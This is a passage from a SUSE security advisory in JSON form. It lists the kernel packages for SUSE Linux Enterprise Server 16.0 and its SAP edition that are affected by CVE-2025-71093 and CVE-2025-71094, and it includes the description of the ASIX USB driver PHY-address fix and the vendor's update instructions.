"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
